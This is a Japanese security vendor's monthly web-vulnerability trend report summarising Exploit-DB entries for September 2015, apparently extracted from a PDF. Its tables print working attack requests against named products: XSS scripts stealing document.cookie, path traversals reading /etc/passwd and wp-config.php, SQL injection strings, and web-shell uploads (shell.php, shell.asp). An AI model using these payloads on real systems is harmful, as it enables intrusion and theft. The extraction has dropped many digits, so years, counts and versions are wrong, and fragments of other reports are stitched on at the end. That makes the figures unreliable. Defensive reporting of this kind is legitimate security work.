最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム

Size: px

Start display at page:

Download "最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム"

きみえさだい
5 years ago
Views:

1 05.09

2 最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 05 年 9 月は Exploit-DB の分析結果をみるとクロスサイトスクリプティング (Cross Site Scripting) 攻撃に関する脆弱性が最も多く報告されましたクロスサイトスクリプティング (Cross Site Scripting) 攻撃の場合スクリプトを単にパラメータに挿入する形で Web 開発の際にパラメータに対するセキュアコーディング (Secure Coding) を行っていれば簡単に防げる攻撃タイプでしたその次に多く報告されたのが SQL インジェクションでした SQL インジェクションの場合ハッカーが攻撃しやすいパラメータ名使用していましたパラメータの入力値の検証を行い攻撃を防ぐことも重要ですが推測不可能なパラメータ名を使いハッカーの標的にならないようにする取り組みが必要ですリモートファイル挿入 (Remote File Conclusion) やローカルファイル挿入 (Local File Conclusion) の攻撃に対しても同様です関連ソフトウェアを利用する企業の管理者様は脆弱性にさらされないよう最新バージョンへのアップデートやセキュアコーディングを行うことを推奨します. 脆弱性別件数脆弱性カテゴリ件数リモートファイル挿入 (Remote File Inclusion:RFI) ファイルアップロード 5 (File Upload) ローカルファイル挿入 7 (Local File Inclusion:LFI) SQL インジェクション 9 (SQL Injection) クロスサイトスクリプティング 0 (Cross Site Scripting : XSS) 合計 5 脆弱性別件数危険度別件数危険度件数割合危険度別分類早急対応要 9 8% 高 7% 合計 00% 9 早急対応要高. 攻撃実行の難易度別件数難易度件数割合難 6% 中 % 易 9 9% 合計 00% 攻撃実行の難易度別件数難中易 9 4. 主なソフトウェア別脆弱性発生件数ソフトウェア名 Openfire Bedita refbase Automation ZeusCart JSPMySQL Administrador Monsta FTP Octogate Centreon Pligg Kaseyar DirectAdmin YesWiki Vtiger FireEye FAROL WordPress ManageEngine EventLog Analyzer 合計件数主なソフトウェア別脆弱性発生件数 Openfire Bedita refbase Automation ZeusCart JSPMySQL Administrador Monsta FTP Octogate Centreon Pligg Kaseyar DirectAdmin YesWiki Vtiger FireEye FAROL WordPress Copyright 05 Penta Security Systems Inc. All rights reserved

3 最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可高 : システム情報を取得するかあるいはクライアントに次被害を及ぼす中 : 情報漏洩攻撃実行難易度分類基準難 : 複数の脆弱性を突いた攻撃パターン対象のシステムの重要な情報を取得するため高度な攻撃コードを採用したパターン知らされていない攻撃コードを採用したパターンのいずれかに該当する中 : 攻撃手法自体は難しくないが迂回コードを採用したパターン易 : 回のリクエストで攻撃が成立するパターン複数回トライするも既知の攻撃コードを採用したパターンのいずれかに該当する ** 5 件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号脆弱性カテゴリ攻撃難易度危険度脆弱性名ソフトウェア名 Copyright 05 Penta Security Systems Inc. All rights reserved

4 最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です日付 EDB 番号脆弱性カテゴリ攻撃難易度危険度脆弱性名攻撃コード対象プログラム対象環境 XSS 易高 Bedita.5. - /bedita/index.php/admin/save Config XSS 脆弱性 POST /bedita/index.php/admin/saveconfig HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 cfg%5bprojectname%5d=<script>alert(45)</script> Bedita Bedita XSS 易高 XSS 易高 POST /bedita/index.php/areas/savearea HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Bedita.5. - Chrome/ Safari/55.7 /bedita/index.php/areas/savea rea XSS 脆弱性 cfg%5bprojectname%5d=<script>alert(45)</script> POST /bedita/index.php/areas/savesection HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Bedita.5. - Chrome/ Safari/55.7 /bedita/index.php/areas/saves ection XSS 脆弱性 Bedita Bedita.5. Bedita Bedita LFI 易早急対応要 LFI 易早急対応要 XSS 易高 XSS 易高 %6lt%B%Ftextarea%6gt%B%Cscript%Ealert% 8%9%C%Fscript%E /vul_test/yeswiki/wakka.php?wiki=pagesacreer/edit&the YesWiki 0. - wakka.php LFI 脆 me=yeswiki&squelette=/../../../../../../../../../../../../etc/pass 弱性 wd&style=gray.css&bgimg=&newpage= FireEye Appliance - NEI_ModuleDispatch.php LFI 脆弱性 JSPMySQL Administrador - listabd.jsp XSS 脆弱性 DirectAdmin Web Control Panel.48 - /CMD_FILE_MANAGER XSS 脆弱性 /script/nei_moduledispatch.php?module=nei_advancedc onfig&function=hapigetfilecontents&name=../../../../../../../../../../../etc/passwd&extension=&category=operating% 0system%0logs&mode=download&time=...&mytoken= /sys/sys/listabd.jsp?bd=%/%e%cscript%ealert% 8666%9%C/script%E POST /CMD_FILE_MANAGER HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 YesWiki YesWiki 0. FireEye JSPMySQL Administrador DirectAdmin FireEye Appliance JSPMySQL Administrador v. DirectAdmin Web Control Panel LFI 易高 XSS 易高 LFI 易高 SQL Injection 易高 Octogate UTM.0. - download.php LFI 脆弱性 Monsta FTP.6. - /monsta_ftp_v.6._install/ XSS 脆弱性 < admin.php LFI 脆弱性 < admin.php SQL Injection 脆弱性 path=/xss/"><script>alert(/xss Vuln/)</script> /scripts/download.php?file=/../../../../../../octo/etc/ini.d/oc togate.ini&type=dl /monsta_ftp_v.6._install/?openfolder="/><script>alert(' XSS by hyprlinx '%bdocument.cookie)</script> /wp-admin/admin.php?page=elisqlreportssettings&download_sql_backup=../../../wp-config.php POST /wp-admin/admin.php?page=elisqlreportssettings HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 Octogate Octogate UTM.0. Monsta FTP Monsta FTP.6. < 4..7 < 4..7 DB_NAME=%0and%0= SQL Injection 易高 ManageEngine EventLog Analyzer < runquery.do SQL Injection 脆弱性 POST /event/runquery.do HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 ManageEngine EventLog Analyzer ManageEngine EventLog Analyzer < 0.6 execute=true&query=select+version%8% File Upload 易早急対応要 < configdb_file.php File Upload 脆弱性 POST /6..5.0_5054/php/configdb_file.php?seenform= HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) dd009908f < dd009908f Content-Disposition: form-data; name="filedata"; filename="shelll.php" dd009908f-- Copyright 05 Penta Security Systems Inc. All rights reserved

5 最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です日付 EDB 番号脆弱性カテゴリ攻撃難易度危険度脆弱性名攻撃コード対象プログラム対象環境 LFI 易早急対応要 < save_file.php LFI 脆弱性 /6..5.0_5054/php/save_file.php?ftype=log&fname=../../ etc/passwd < ]/6..5.0_5054/php/save_config_file.php?filename=../../ LFI 易早急対応要 save_config_file.php LFI 脆弱性./../../../../../etc/passwd XSS 易高 XSS 易高 RFI 易高 SQL Injection 易高 Openfire.0. - serversession-details.jsp XSS 脆弱性 Openfire.0. - groupsummary.jsp XSS 脆弱性 Openfire.0. - availableplugins.jsp RFI 脆弱性 WordPress CP Reservation Calendar Plugin..6 - /server-session-details.jsp?hostname= "/><script>alert(666)</script> /groupsummary.jsp?search=%+onmousemove%d%alert%8 %7hyprlinx%7%9 /availableplugins.jsp?download=&url= malgod.exe POST /wordpress/?action=dex_reservations_check_posted_data HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 /wordpress/ SQL Injection 脆弱 Chrome/ Safari/55.7 性 dex_reservations_post=&dex_item=%0and%0= < 6.. < 6.. Openfire Openfire.0. Openfire Openfire.0. Openfire Openfire.0. WordPress WordPress CP Reservation Calendar Plugin SQL Injection 難早急対応要 FAROL - Login.actions.php SQL Injection 脆弱性 POST /tkmonitor/estrutura/login/login.actions.php?recuperar HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 FAROL FAROL All Version SQL Injection 難早急対応要 SQL Injection 易高 LFI 易高 ZeusCart index.php SQL Injection 脆弱性 ='%0or%0=ctxsys.drithsx.sn(,(select%0sys.s tragg(distinct%0banner)%0from%0v$version))-- /zeuscartmaster/index.php?do=featured&action=showmaincatlandi ng&maincatid=- AND IF(SUBSTRING(version(),, )=5,BENCHMARK( ,version()),null) Pligg CMS.0. - /pligg-cmsmaster/load_data_for_search.php?sql=%0and%0= load_data_for_search.php SQL Injection 脆弱性 CMS <=..0 - /kirby/panel/login LFI 脆弱性 POST /kirby/panel/login HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 ZeusCart ZeusCart 4.0 Pligg Pligg CMS.0. CMS <=..0 username=..%f..%f..%f..%f..%f..%f..%f..% Ftmp%Fbypassauth&password=trythisout&_csfr=erQUv OmL File Upload 易高 POST /kirby/panel/api/files/upload/about HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) CMS <= dd009908f /kirby/panel/api/files/upload/a bout File Upload 脆弱性 dd009908f Content-Disposition: form-data; name="filedata"; filename="kirbyexec.php5" CMS <= SQL Injection 中早急対応要 SQL Injection 易高 refbase <= rss.php SQL Injection 脆弱性 refbase <= install.php SQL Injection 脆弱性 dd009908f-- /rss.php?where='nonexistent'+union+all(select+,,,4,5, 6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,4, 5,6,7,8,9,0,,,concat('version:',@@version,''),4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,50)-- %0- POST /install.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 refbase refbase <= refbase refbase <= formtype=install&submit=install&adminusername=root& adminpassword=pass&pathtomysql=c:\mysql5.6.7\b in\mysql.exe&databasestructurefile=./install.sql&pathto Bibutils=&defaultCharacterSet=%0and%0=&submi t=install XSS 易高 /cgibin/module/sharedobjmanager/policy_new/874/policytabl /cgibin/module/sharedobjmanager e?vdom=%%7/%e%c/script%e%cscript%eal ert%8%7[xss%0%0poc%0vm64% /policy_new/874/ XSS 脆弱性 0v5..% %0]\n\n%7%bdocument.c ookie%9%c/script%e 5.. Copyright 05 Penta Security Systems Inc. All rights reserved

6 最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です日付 EDB 番号脆弱性カテゴリ攻撃難易度危険度脆弱性名攻撃コード対象プログラム対象環境 File Upload 易高 Vtiger CRM <= /index.php File Upload 脆弱性 POST /index.php HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) dd009908f Vtiger Vtiger CRM <= dd009908f Content-Disposition: form-data; name=" vtrftk"; filename=".php" dd009908f File Upload 易早急対応要 Centreon.6. - main.php File Upload 脆弱性 POST /centreon/main.php?p=500 HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) dd009908f Centreon Centreon dd009908f Content-Disposition: form-data; name="filename"; filename="phpinfo.php" dd009908f SQL Injection 易高 POST /sqlconsole.shtm HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Automation Chrome/ Safari/55.7 sqlconsole.shtm SQL Injection 脆弱性 Automation Automation.6.0 sqlstring=select+*+from+users%b&query=submit+quer y XSS 易高 Automation login.htm XSS 脆弱性 POST /login.htm HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 Automation Automation.6.0 username="><script>alert("xss");</script>' / File Upload 易高 Kaseya Virtual System Administrator - json.ashx File Upload 脆弱性 POST /vsapres/web0/json.ashx HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) dd009908f dd009908f Content-Disposition: form-data; name="impinf uploadfilelocation"; filename="shell.asp" Kaseyar Kaseya Virtual System Administrator <% response.write "Shell" %> dd009908f-- Copyright 05 Penta Security Systems Inc. All rights reserved

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 06.0 最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年月に公開された Exploit-DB の分析の結果 SQL Injection 攻撃に対する脆弱性報告数が最も多かったです

最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム

最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム